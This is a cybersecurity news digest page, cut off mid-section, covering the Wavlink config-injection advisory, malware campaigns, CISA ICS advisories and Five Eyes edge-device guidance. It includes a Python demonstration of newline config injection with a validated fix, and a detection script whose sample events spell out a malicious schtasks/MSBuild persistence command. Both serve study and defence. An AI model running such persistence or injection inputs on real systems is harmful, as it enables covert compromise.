Multiple external config control vulnerabilities exist in the openvpn.cgi openvpn_server_setup() functionality of Wavlink AC3000 M33A8.V5030.210505. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. A configuration injection vulnerability exists in the `open_port` POST parameter.
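The vulnerability class above, as an added example that is not Wavlink's code: a `port`-style POST parameter that is written verbatim into a generated configuration file becomes an injection primitive as soon as the value can carry a newline, because every line after the newline is parsed as a further directive. The config template, the parameter names and the two request samples are assumptions constructed for illustration; the injected directive is deliberately a harmless verbosity setting, the point being that the attacker controls which lines end up in the file.

```python
import re

# Constructed sample requests (hypothetical parameter handling, not the vendor's code).
VALID_REQUEST = {"open_port": "1194"}
# Constructed: the value carries a newline and an extra directive. Written
# verbatim, it adds a line the operator never wrote; any directive could go here.
INJECTED_REQUEST = {"open_port": "1194\nverb 9"}

# Assumed minimal template for the generated server config.
TEMPLATE = "proto udp\nport {port}\ndev tun\n"


def render_config_vulnerable(params: dict) -> str:
    """Vulnerable pattern: the parameter is interpolated without validation."""
    return TEMPLATE.format(port=params["open_port"])


def validate_port(value: str) -> int:
    """Hardened: accept only an ASCII decimal integer in 1..65535.

    fullmatch rejects whitespace, newlines and anything non-numeric, so no
    second directive can ride along with the port number.
    """
    if not re.fullmatch(r"[0-9]{1,5}", value):
        raise ValueError("open_port must be a decimal integer")
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError("open_port out of range")
    return port


def render_config_hardened(params: dict) -> str:
    """Same template, but only a validated integer ever reaches it."""
    return TEMPLATE.format(port=validate_port(params["open_port"]))


def directive_count(config: str) -> int:
    """Number of non-empty lines; a faithful render of TEMPLATE has exactly 3."""
    return sum(1 for line in config.splitlines() if line.strip())


def safely_rendered(params: dict) -> bool:
    """True if the hardened renderer accepted the input, False if it rejected it."""
    try:
        render_config_hardened(params)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(render_config_vulnerable(INJECTED_REQUEST))  # four directives, one injected
    print(render_config_hardened(VALID_REQUEST))
    print("injected input rejected:", not safely_rendered(INJECTED_REQUEST))
```

The check is an allow-list on the value's shape, not a deny-list of dangerous characters: a port is a small integer, so anything that is not one is rejected before it can reach the file writer.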

Security News

The latest cybersecurity news, collected from a wide range of security websites.

On Thursday February 6th, we experienced an outage with our object storage service (R2) and products that rely on it. Here's what happened and what we're doing to fix this going forward.

by Cloudflare

Ya-moon, S. Korea’s notorious sex crime hub operating since 1990, hacked; user data leaked, exposing CSAM, exploitation, and illicit activities.

by Hackread

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Outlook, Sophos XG Firewall, and other flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-21413 (CVSS score of 9.8) is a Remote Code Execution flaw in Microsoft Outlook. […]

by Security Affairs

Rep. Josh Gottheimer (D-N.J.) called the emergence of DeepSeek's AI tools "a five alarm national security fire."

by The Record

Cyble researchers have discovered a sophisticated malware attack that uses dual injection techniques to bypass Google Chrome’s App-Bound Encryption. Chrome App-Bound Encryption was introduced last year to protect cookies from infostealer malware, so attacks that bypass that protection could potentially access user accounts and other sensitive information. In a blog post this week, Cyble researchers detailed the sophisticated attack, which hides a malicious LNK file in a ZIP file – disguised as a PDF – and also makes a malicious XML project look like a PNG to trick users into opening it.

“This attack leverages fileless execution, scheduled task persistence, and Telegram-based communication to evade detection while stealing sensitive data,” the researchers wrote. “By exploiting MSBuild.exe and using a double injection technique, the malware executes directly in memory, making it harder to detect. Its ability to bypass Chrome’s Application-Bound Encryption and extract credentials further strengthens its impact.”

Sophisticated Chrome App-Bound Encryption Bypass Detailed

The Cyble researchers said the file names suggest that the malware is “likely targeting organizations in Vietnam, particularly in the Telemarketing or Sales sectors.” It’s not clear how the malware was initially delivered. The researchers provided an in-depth analysis of the infection chain, which includes an LNK file that creates a scheduled task that runs every 15 minutes, using Microsoft Build Engine to deploy malicious C# code. The shortcut file copies an XML project file to the Temp directory and initiates a command to create the scheduled task, which launches MSBuild.exe to execute embedded C# code from the XML file. “The malicious code operates within the MSBuild.exe process, deploying different components based on the system’s architecture,” the researchers wrote.

The double injection technique used by the malware — Process Injection and Reflective DLL Injection — allows it "to stealthily execute malicious code in memory without leaving traces on the disk, making it harder for traditional security solutions to detect."

Telegram Web API Used for Command and Control

The malware uses the Telegram Web API to establish command and control communications with the threat actor (TA), and the malware “enables the TA to change the Telegram bot ID and chat ID as required, offering flexibility in controlling their communication channels.” “The use of Telegram Web API for exfiltration and dynamic bot ID switching ensures continued control over infected systems,” the researchers said. The threat actor can use that connection to issue a range of commands, such as bypassing Chrome App-Bound Encryption to steal an encryption key, deploying a custom info stealer, and exfiltrating sensitive user data from the Chrome browser, including cookies and login data.

To prevent falling victim to such attacks, Cyble recommended that organizations engage in user training, implement strict email attachment filtering and application whitelisting, and limit file execution paths and extensions, among other defensive steps. The full Cyble blog includes in-depth analysis of the infection chain, communications and exfiltration, Indicators of Compromise (IoCs), and MITRE ATT&CK Techniques.

by The Cyber Express
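The infection chain described in the Cyble item above has two observable steps that a process-creation feed catches well: schtasks.exe registering a minute-interval task whose action is MSBuild.exe, and MSBuild.exe later running a project file out of a user-writable Temp directory under a parent that is not a build tool. The following detection logic is an added example, not Cyble's code and not a published rule; the record shape (Sysmon Event ID 1 style Image, ParentImage and CommandLine fields), the four sample events and the list of expected MSBuild parents are constructed assumptions to tune per environment.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields
# (Image, ParentImage, CommandLine). Paths and values are illustrative only.
SAMPLE_EVENTS = [
    {   # the LNK's task creation: every 15 minutes, action is MSBuild on a Temp XML
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks /create /sc minute /mo 15 /tn Updater /tr "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\u\AppData\Local\Temp\report.xml"',
    },
    {   # the task firing: MSBuild launched by the Task Scheduler service host
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\u\AppData\Local\Temp\report.xml",
    },
    {   # benign developer build from Visual Studio
        "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
        "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
    },
    {   # benign scheduled task that does not involve MSBuild
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks /create /sc daily /tn Backup /tr "C:\Tools\backup.exe"',
    },
]

MSBUILD = re.compile(r"msbuild\.exe", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"schtasks(\.exe)?\s+/create\b", re.IGNORECASE)
MINUTE_INTERVAL = re.compile(r"/sc\s+minute\b", re.IGNORECASE)
USER_WRITABLE_TEMP = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# Parents from which MSBuild is expected on a developer or build host (assumed; tune locally).
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of every rule the event trips (empty list if none)."""
    hits = []
    cmd = event.get("CommandLine", "")
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))

    # Persistence step: a task being registered whose action runs MSBuild.
    if SCHTASKS_CREATE.search(cmd) and MSBUILD.search(cmd):
        hits.append("scheduled_task_launches_msbuild")
        if MINUTE_INTERVAL.search(cmd):
            hits.append("minute_interval_task")

    # Execution step: MSBuild itself, judged by where its project lives and who spawned it.
    if image == "msbuild.exe":
        if USER_WRITABLE_TEMP.search(cmd):
            hits.append("msbuild_project_in_temp")
        if parent not in EXPECTED_MSBUILD_PARENTS:
            hits.append("msbuild_unexpected_parent")
    return hits


def scan(events) -> list:
    """(index, hits) for every event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["Image"], hits)
```

Each rule is weak on its own (developers do run MSBuild, and plenty of software creates scheduled tasks), which is why the two events that belong to the chain each trip two rules while the two benign events trip none; scoring on the combination is what keeps the false-positive rate tolerable.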

OpenAI's latest tech can reason better than its previous models could, but not well enough to ferret out careful social engineering.

by Dark Reading

A federal judge on Wednesday ruled that a lawsuit challenging a Virginia city’s use of automatic license plate readers can move forward.

by The Record

While President Trump supported federal space efforts during his first administration, the addition of SpaceX chief Elon Musk to his circle likely means challenges for regulating spacecraft cybersecurity, experts say.

by Dark Reading

New mobile apps from the Chinese artificial intelligence (AI) company DeepSeek have remained among the top three "free" downloads for Apple and Google devices since their debut on Jan. 25, 2025. But experts caution that many of DeepSeek's design choices -- such as using hard-coded encryption keys, and sending unencrypted user and device data to Chinese companies -- introduce a number of glaring security and privacy risks.

by Krebs on Security

Riding the wave of notoriety from the Chinese company's R1 AI chatbot, attackers are spinning up lookalike sites for different malicious use cases.

by Dark Reading

CISA and the FDA are warning that Contec CMS8000 and Epsimed MN-120 patient monitors are open to meddling and data theft; Claroty Team82 flagged the vulnerability as an avoidable insecure design issue.

by Dark Reading

A bipartisan duo in the U.S. House is proposing legislation to ban the Chinese artificial intelligence app DeepSeek from federal devices.

by SecurityWeek

Bogus websites advertising Google Chrome have been used to distribute malicious installers for a remote access trojan called ValleyRAT. The malware, first detected in 2023, is attributed to a threat actor tracked as Silver Fox, with prior attack campaigns primarily targeting Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China. "This actor has increasingly targeted key roles

by The Hacker News

Ransomware attacks netted cybercrime groups a total of $813.5 million in 2024, a decline from $1.25 billion in 2023. The total amount extorted during the first half of 2024 stood at $459.8 million, blockchain intelligence firm Chainalysis said, adding payment activity slumped after July 2024 by about 3.94%. "The number of ransomware events increased into H2, but on-chain payments declined,

by The Hacker News

Thorsten examines last year’s CVE list and compares it to recent Talos Incident Response trends. Plus, get all the details on the new vulnerabilities disclosed by Talos’ Vulnerability Research Team.

by Cisco Talos Blog

Zimperium warns that threat actors have stolen the information of tens of thousands of Android users in India using over 1,000 malicious applications.

by SecurityWeek

The North Korean APT group has leveraged a custom RDP Wrapper and new malware called forceCopy in recent campaigns.

by SC Media

Discover how RansomHub is rising in the ransomware landscape, using tools like Atera and Splashtop, reconnaissance tactics, and double extortion techniques.

by Darktrace

Following allegations of potential abuse, Paragon Solutions has cut off Italy from its spyware systems.

by TechCrunch

Reimagining your SOC Part 3/3: This blog explores the challenges security professionals face in managing cyber risk, evaluates current market solutions, and outlines strategies for building a proactive security posture.

by Darktrace

A Chinese national is facing multiple charges of economic espionage and theft of trade secrets after he was accused of stealing AI technology from Google

by SC Media

This article was originally published in the SOC Issue of our PROMPT# zine, which is available to read for free. The information was adapted from the 2018 webcast “John Strand’s […]

by Black Hills Information Security

News about USPS suspending shipments from China and Hong Kong may give scammers some ideas to defraud consumers

by Malwarebytes Labs

Barracuda''s flexible deployment options ensure that businesses of all sizes and industries can implement advanced email security in a way that aligns with their operational requirements, technical expertise, and existing infrastructure.

by Barracuda

Cybersecurity compliance goes beyond just meeting regulations. The point of security standards, like those from the National Institute of Standards and Technology (NIST), is to continuously defend your organization and customers against evolving threats. The NIST Cybersecurity Framework provides essential guidelines to help you manage risks and protect sensitive data effectively. Staying compliant should be a bonus to safeguarding your data.

by Legit Security

Imagine a thief silently slipping into your home and copying your keys so they can get back in. They don’t steal anything on their first visit, so you don’t even realize they were there. This is essentially what happens with credential harvesting, a cybercrime where attackers steal usernames and passwords to access sensitive systems or data.

by Legit Security

A new malware campaign dubbed SparkCat has leveraged a suite of bogus apps on both Apple's and Google's respective app stores to steal victims' mnemonic phrases associated with cryptocurrency wallets. The attacks leverage an optical character recognition (OCR) model to exfiltrate select images containing wallet recovery phrases from photo libraries to a command-and-control (C2) server,

by The Hacker News

All but two Department of Government Efficiency staffers are temporarily stopped from accessing Treasury payment systems.

by The Record

Privileged Access Management (PAM) has emerged as a cornerstone of modern cybersecurity strategies, shifting from a technical necessity to a critical pillar in leadership agendas. With the PAM market projected to reach $42.96 billion by 2037 (according to Research Nester), organizations invest heavily in PAM solutions. Why is PAM climbing the ranks of leadership priorities? While Gartner

by The Hacker News

The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center (ASEC). The attacks commence with phishing emails containing a Windows shortcut (LNK) file that''s disguised as a Microsoft Office or PDF document.

by The Hacker News

You arrive at the office, power up your system, and panic sets in. Every file is locked, and every system is frozen. A ransom demand flashes on your screen: "Pay $2 million in Bitcoin within 48 hours or lose everything." And the worst part is that even after paying, there’s no guarantee you’ll get your data back. Many victims hand over the money, only to receive nothing in return, or worse, get

by The Hacker News

Spring Boot is a powerful framework that makes it easy to develop Java applications. However, security is a crucial aspect that must be…

by InfoSec Write-ups

This is how I hacked the Underpass machine easily, and how you can do that yourself.

by InfoSec Write-ups

This is a TryHackMe walkthrough on the newly released Intro to Docker room. I will try my best to keep it clear and…

by InfoSec Write-ups

Russian intelligence services are using messaging apps and online forums to recruit Ukrainian citizens for terrorist attacks, promising quick payoffs, according to Ukraine’s law enforcement.

by The Record

DeepSeek-R1 LLM fails 58% of jailbreak attacks in Qualys security analysis. Learn about the vulnerabilities, compliance concerns, and risks for enterprise adoption.

by Hackread

The fixes secure several WiFi 6 access points and Nighthawk Pro Gaming routers from two critical bugs.

by ZDNET Security

Microsoft warns that attackers are deploying malware in ViewState code injection attacks using static ASP.NET machine keys found online.

by BleepingComputer

Flaw could let attackers escalate privileges on popular Google Android and Pixel devices.

by SC Media

The company has upped its reward for red-teaming Constitutional Classifiers. Here's how to try.

by ZDNET Security

For the second time in nine days, a prominent U.K. engineering company reported a cyber incident. Birmingham-based IMI says it is responding to "unauthorised access."

by The Record

Cisco has addressed critical flaws in Identity Services Engine (ISE) that could allow privilege escalation and system configuration changes. The fixes cover multiple vulnerabilities, including two critical remote code execution flaws, tracked as CVE-2025-20124 (CVSS score of 9.9) and CVE-2025-20125 (CVSS score of 9.1). A remote attacker authenticated with read-only administrative privileges could exploit the […]

by Security Affairs

Trying to break through to a broader international audience, Press TV turns to the social platforms Telegram and Rumble.

by DFRLab

Here's what happened, what Grubhub has done about it, and what you should do too.

by ZDNET Security

When it comes to protecting your company from cyberattacks, you don't have to be the fastest gazelle — you just can't afford to be the slowest.

by Dark Reading

We tested the best Bluetooth trackers (including AirTags and Tile trackers) to keep tabs on your belongings, whether you use iOS or Android.

by ZDNET Security

Expel announced expanded security information and event management (SIEM) coverage, including a new low-cost data lake offering, allowing customers to meet compliance and data storage requirements more effectively while strengthening their overall security posture. Additionally, Expel extended integration coverage and support for several industry-leading SIEM and extended detection and response (XDR) products, including Sumo Logic Cloud SIEM and CrowdStrike Falcon LogScale environments. “Organizations are navigating an increasingly complex landscape when it comes to the balance …

by Help Net Security

UPDATED Feb. 5, 2025 — As COVID-19 drove everyone online, tech companies hired like crazy. Call it the COVID Tech Bubble. Now we are hitting the COVID tech bust as tech giants shed jobs by the thousands. Check back regularly for updates to our IT job layoffs tracker.

by ITPro Today

A KnowBe4 Threat Lab publication. Authors: Daniel Netto, Jeewan Singh Jalal, Anand Bodke, and Martin Kraemer

by KnowBe4

The rise of agentic AI tools will transform the cybercrime landscape, according to a new report from Malwarebytes.

by KnowBe4

In cybersecurity, too often, the emphasis is placed on advanced technology meant to shield digital infrastructure from external threats. Yet, an equally crucial — and underestimated — factor lies at the heart of all digital interactions: the human mind. Behind every breach is a calculated manipulation, and behind every defense, a strategic response. The psychology […]

by Security Intelligence

The North Korean hacking group known as Kimsuky was observed in recent attacks using a custom-built RDP Wrapper and proxy tools to directly access infected machines. [...]

by BleepingComputer

Workday is laying off 8.5% of its workforce to streamline operations, invest in AI, and drive profitability, joining other major tech firms in workforce reductions.

by ITPro Today

Lynx ransomware, a rebranded and advanced variant of the earlier INC ransomware, has quickly established itself as a significant threat in the cybersecurity landscape. Operating under a Ransomware-as-a-Service (RaaS) model, Lynx employs sophisticated tactics such as double extortion and advanced encryption to target industries across the U.S. and UK. 

by Picus Security

Chainalysis’ latest report on how the ransomware landscape changed from 2023 to 2024 shows a promising trend: an increasing number of victims refuses to pay the ransom. The total volume of ransom payments decreased year-over-year by approximately 35%, the blockchain analysis firm says. In 2023, victims delivered $1.25 billion to ransomware attackers and data theft and extortion gangs. In 2024, the number fell to $813.55 million. [Figure: Ransomware payments vs. data leak site victims, 2024]

by Help Net Security

Astra Security and Invary have received new funding to fuel development of their vulnerability scanning and runtime security solutions.

by SecurityWeek

ActiveState launched its Vulnerability Management as a Service (VMaaS) offering that revolutionizes how organizations manage open source and accelerates secure software delivery. ActiveState’s Vulnerability Management as a Service combines Application Security Posture Management (ASPM) and Intelligent Remediation capabilities with expert guidance. This solution enables DevSecOps teams to not only identify vulnerabilities in open source packages, but also to automatically prioritize, remediate, and deploy fixes into production without breaking changes, ensuring that applications are truly secured. …

by Help Net Security

Spanish authorities have arrested an individual who allegedly hacked several high-profile organizations, including NATO and the US army.

by SecurityWeek

CISA warned U.S. federal agencies on Thursday to secure their systems against ongoing attacks targeting a critical Microsoft Outlook remote code execution (RCE) vulnerability. [...]

by BleepingComputer

UAC-0006, a financially motivated threat actor, targets PrivatBank customers with advanced phishing attacks. CloudSEK’s research reveals malicious emails…

by Hackread

Mobile spyware attacks are on the rise globally. That's why you should treat your phone like a computer, according to this cybersecurity expert.

by ZDNET Security

UK data protection authority confirms it's received a data breach report from the company.

by TechCrunch

Cisco has released updates to address two critical security flaws in Identity Services Engine (ISE) that could allow remote attackers to execute arbitrary commands and elevate privileges on susceptible devices. The vulnerabilities are listed below - CVE-2025-20124 (CVSS score: 9.9) - An insecure Java deserialization vulnerability in an API of Cisco ISE that could permit an authenticated, remote

by The Hacker News

Corero Network Security announced new advancements in multi-site resiliency and intelligent traffic management, further strengthening its ability to deliver always-on DDoS protection. Designed to mitigate large-scale cyberattacks, operational failures, and data center outages, Corero’s solution eliminates single points of failure by automatically adapting when a security component, data center, or network segment goes offline—ensuring seamless operations without disruption or manual intervention. Modern organizations require continuous availability, but traditional solutions lack resilience in the face of …

by Help Net Security

Quantum computers could soon break today's strongest encryption, putting sensitive data at risk. Let's dive deep into what this all means for telecommunications, security, AI, and our future.

by ZDNET Security

Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks. [...]

by BleepingComputer

IMI plc is addressing a cybersecurity breach involving unauthorized access. The company has engaged experts to deal with the issue.

by The Cyber Express

Five Eyes cybersecurity agencies have released guidance on securing edge devices against increasing threats.

by SecurityWeek

The Institute for Critical Infrastructure Technology (ICIT) Digital Consolidation Risk and National Security briefing addresses the growing risks associated with IT and cybersecurity consolidation. The briefing showcases the findings and recommendations of ICIT's six-member Task Force, composed of industry experts and leaders to shape cybersecurity policy for the next Administration. Panel 2: Task Force Panel

by SC Media

The blame for security incidents may be shared—but the burden of response always falls on the security team. Here’s how to prepare for the inevitable.

by SecurityWeek

The Institute for Critical Infrastructure Technology (ICIT) Digital Consolidation Risk and National Security briefing addresses the growing risks associated with IT and cybersecurity consolidation. The briefing showcases the findings and recommendations of ICIT's six-member Task Force, composed of industry experts and leaders to shape cybersecurity policy for the next Administration. Panel 1: Fireside Chat - Digital Consolidation

by SC Media

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) released a series of nine Industrial Control Systems (ICS) advisories on February 4, 2025. These CISA ICS advisories provide essential information about vulnerabilities, security risks, and recommended mitigations affecting various industrial control systems and their components. The advisories, which highlight numerous threats across a variety of devices, emphasize the need for vigilance and prompt action to protect critical infrastructure from potential exploits. The nine advisories address flaws found in systems from notable vendors such as Schneider Electric, Rockwell Automation, and AutomationDirect. These vulnerabilities can allow attackers to disrupt operations, gain unauthorized access, or even execute remote code on compromised devices.

Details of the Industrial Control Systems Advisories

1. Western Telematic Inc. Vulnerability
Advisory Code: ICSA-25-035-01
Vulnerable Products: NPS Series, DSM Series, CPM Series
An authentication bypass vulnerability (CVE-2025-0630) allows an attacker to access and manipulate files on affected devices' filesystems. This flaw, present in versions of the products running firmware 6.62 or earlier, has a CVSS v4 score of 6.0, indicating medium risk. Users are advised to update affected products to firmware versions 8.06 or 4.02 and to change default passwords before deployment.

2. Rockwell Automation Vulnerability
Advisory Code: ICSA-25-035-02
Vulnerable Products: 1756-L8zS3, 1756-L3zS3
A vulnerability in Rockwell's 1756-L8zS3 and 1756-L3zS3 PLC models (CVE-2025-24478) allows attackers to cause a denial-of-service (DoS) condition through malicious requests. The flaw, rated with a CVSS v4 score of 7.1, is exploitable remotely and requires low attack complexity. Users should update to the latest firmware versions to mitigate the risk.

3. Elber Communications Equipment Vulnerabilities
Advisory Code: ICSA-25-035-03
Vulnerable Products: Signum DVB-S/S2 IRD, Cleber/3 Broadcast Multi-Purpose Platform, Reble610 M/ODU XPIC, IP-ASI-SDH, ESE DVB-S/S2 Satellite Receiver, Wayber Analog/Digital Audio STL
Elber's devices are affected by an authentication bypass (CVE-2025-0674) and a hidden functionality vulnerability (CVE-2025-0675). Exploiting these flaws allows attackers unauthorized administrative access. The vulnerabilities, which carry high CVSS v4 scores of 9.3 and 8.7, affect several products with versions that are either obsolete or at the end of their lifecycle. Users are urged to contact Elber for guidance.

4. Schneider Electric Modicon M580 PLCs and EVLink Pro AC Vulnerability
Advisory Code: ICSA-25-035-04
Vulnerable Products: Modicon M580 PLCs, BMENOR2200H, EVLink Pro AC
This vulnerability (CVE-2024-11425) affects Schneider Electric’s Modicon M580 PLCs, BMENOR2200H, and EVLink Pro AC products, and can lead to a denial-of-service (DoS) condition via improper buffer size calculations. With a CVSS v4 score of 8.7, this flaw is exploitable remotely and requires low attack complexity. Users should update the affected products to newer firmware versions to mitigate risks.

5. Schneider Electric Web Designer for Modicon Vulnerability
Advisory Code: ICSA-25-035-05
Vulnerable Products: Web Designer for Modicon
This vulnerability (CVE-2024-12476) within Schneider Electric's Web Designer for Modicon could allow an attacker to execute arbitrary code or cause information disclosure. With a CVSS v3 score of 7.8, this flaw affects all versions of Web Designer. Mitigation measures include encrypting project files, restricting access to trusted users, and using secure communication protocols when transferring files.

6. Schneider Electric Pro-face GP-Pro EX and Remote HMI Vulnerability
Advisory Code: ICSA-25-035-07
Vulnerable Products: Pro-face GP-Pro EX, Pro-face Remote HMI
Schneider Electric’s Pro-face GP-Pro EX and Remote HMI systems suffer from improper enforcement of message integrity during transmission, which could allow for man-in-the-middle (MITM) attacks. This vulnerability (CVE-2024-12399) has a CVSS v4 score of 6.1. To mitigate this, Schneider Electric recommends the use of secure VPNs like Pro-face Connect to encrypt remote communications.

7. AutomationDirect C-more EA9 HMI Vulnerability
Advisory Code: ICSA-25-035-08
Vulnerable Products: C-more EA9 HMI (multiple models)
A classic buffer overflow vulnerability (CVE-2025-0960) in AutomationDirect’s C-more EA9 HMI devices allows remote code execution or DoS attacks. With a CVSS v4 score of 9.3, this critical flaw affects multiple models. AutomationDirect recommends updating to version 6.80 of the C-more EA9 HMI software or isolating the devices from external networks as an interim mitigation measure.

8. Ashlar-Vellum Cobalt, Graphite, Xenon, Argon, and Lithium Vulnerabilities (Update A)
Advisory Code: ICSA-23-299-03
Vulnerable Products: Cobalt, Graphite, Xenon, Argon, Lithium
Several vulnerabilities, including out-of-bounds write, heap-based buffer overflow, and out-of-bounds read issues, were discovered in Ashlar-Vellum’s Cobalt, Graphite, Xenon, Argon, and Lithium product lines. These vulnerabilities, with CVSS v4 scores of 8.4, could allow attackers to execute arbitrary code. Users should update to the latest software versions to mitigate these risks.

Mitigation and Recommendations

Update Firmware and Software: Regularly update both firmware and software to the latest versions to ensure that all known vulnerabilities are patched, and that the system has the latest security improvements.
Apply Security Patches: Promptly apply all security patches issued by vendors for both hardware and software components.
Implement Secure Access Controls: Use multi-factor authentication (MFA) to enhance user verification processes.
Use VPNs and Secure Protocols for Remote Communications: Require the use of Virtual Private Networks (VPNs) to encrypt remote connections, ensuring that communications between remote users and the industrial control system are secure.
Apply Secure Configurations to Systems: Regularly audit system configurations to ensure compliance with security best practices, such as those outlined by industry standards (e.g., NIST, CIS).
Contact Vendor for End-of-Life Devices: For devices approaching end-of-life (EOL), reach out to the manufacturer or vendor to seek guidance on continued support options, updates, and any potential mitigation strategies available.

Conclusion

CISA's recent release of nine advisories highlights vulnerabilities in Industrial Control Systems (ICS) that could jeopardize critical infrastructure. These vulnerabilities, affecting products from major vendors, emphasize the need for immediate action to secure systems. Organizations must implement key mitigation strategies, including firmware updates, applying patches, and secure communications. Cyble enhances this effort with AI-driven cybersecurity solutions like Cyble Vision and Cyble Hawk, offering real-time threat intelligence to help organizations stay ahead of cyber threats. By combining CISA's recommendations with Cyble’s advanced platforms, organizations can better protect their critical systems from cyber adversaries.

by CYBLE

Cisco has fixed two critical Identity Services Engine (ISE) vulnerabilities that can let attackers with read-only admin privileges bypass authorization and run commands as root. [...]

by BleepingComputer

The SaaS pricing model often excludes small businesses by charging a premium for core security features – that must change.

by SC Media

Critical vulnerabilities in Cisco Identity Services Engine could lead to elevation of privileges and system configuration modifications.

by SecurityWeek

The Spanish National Police has arrested a hacker suspected of having breached national and international agencies (including the United Nations' International Civil Aviation Organization and NATO), Spanish universities and companies, and released stolen data on the dark web. The National Police began the investigation in February 2024, after a Madrid business association discovered that a hacker boasted on an underground criminal forum that they had information stolen from the association’s website. “Once the …

by Help Net Security

Container adoption hits 90% as enterprises grapple with the complexity of Kubernetes, a new Nutanix study finds.

by ITPro Today

An ongoing distributed denial of service (DDoS) attack targets Bohemia Interactive''s infrastructure, preventing players of DayZ and Arma Reforger from playing the games online. [...]

by BleepingComputer

Researchers see dozens of fake DeepSeek websites used for credential phishing, cryptocurrency theft, and scams. The post Fake DeepSeek Sites Used for Credential Phishing, Crypto Theft, Scams appeared first on SecurityWeek.

by SecurityWeek

A technical overview of Cisco Talos' investigations into Google Cloud Platform Cloud Build, and the threat surface posed by the storage permission family.

by Cisco Talos Blog

Leaders have high hopes for autonomous capabilities, but adding the technology will raise the stakes for security and governance.

by Cybersecurity Dive

Multiple aliases have been leveraged by the hacker in conducting intrusions against the United Nations, the International Civil Aviation Organization, the Guardia Civil, and other public and private entities, which had their data stolen and sold in BreachForums, according to the Spanish police.

by SC Media

Overview

The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks.

"In the face of a relentless wave of intrusions involving network devices globally our new guidance sets what we collectively see as the standard required to meet the contemporary threat," said NCSC Technical Director Ollie Whitehouse. "In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide investigative capabilities required post intrusion."

Understanding Edge Device Security Risks

Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintain persistent access within networks. In recent years, compromised edge devices have been used in distributed denial-of-service (DDoS) attacks, espionage, and as footholds for ransomware campaigns. The absence of comprehensive logging and forensic capabilities has made it difficult for security teams to detect, investigate, and mitigate such threats in real time.

Key Security Concerns for Edge Devices

The newly issued guidelines focus on several critical security issues associated with edge devices:
Misconfigurations and Poor Management: Weak configurations, such as open ports, improperly set access controls, and default passwords, leave devices exposed to attacks.
Exploitation of Known Vulnerabilities: Unpatched firmware and software provide an entry point for attackers who exploit these weaknesses to gain control over devices.
Denial-of-Service (DoS) Attacks: Edge devices are frequently targeted in distributed denial-of-service (DDoS) attacks that disrupt services by overwhelming devices with malicious traffic.
Inadequate Logging and Monitoring: Limited forensic capabilities hinder the ability of security teams to detect and investigate breaches.
Weak Authentication Mechanisms: Many devices still rely on single-factor authentication, making them vulnerable to credential-based attacks.

Key Recommendations for Securing Edge Devices

The newly published guidance sets forth a baseline for device security, ensuring that manufacturers and organizations take proactive steps to enhance the resilience of edge devices against cyber threats. The core aspects of the guidelines include:

1. Mandatory Logging and Forensic Capabilities

The ability to track and analyze security events is crucial for identifying and responding to cyber threats. The guidelines recommend that network devices and appliances should log key events related to:
Authentication Logs: Devices should record authentication attempts, including usernames, authentication methods (e.g., SSH keys, certificates, MFA), and source IP addresses.
Technical Support Interactions: Any vendor-based remote access events should be logged to track support interventions.
Application and Service Logs: HTTP/HTTPS requests, command-line interactions, and other service-based activities should be recorded, capturing user sessions, accessed resources, and data transfers.
Process Execution Logs: Devices should monitor process creation, termination, and any dynamically loaded modules.
File System Activity: Changes to critical directories, configurations, and system binaries should be logged to identify unauthorized modifications.
Network Activity Logs: Devices should capture DNS queries, network connections, and packet-processing rules to aid in forensic investigations.
Firmware and Software Updates: Logs should document update attempts, versions, error messages, and any integrity verification failures.

By ensuring comprehensive logging, organizations can maintain greater situational awareness and rapidly detect anomalous behavior.

2. Secure Logging Practices

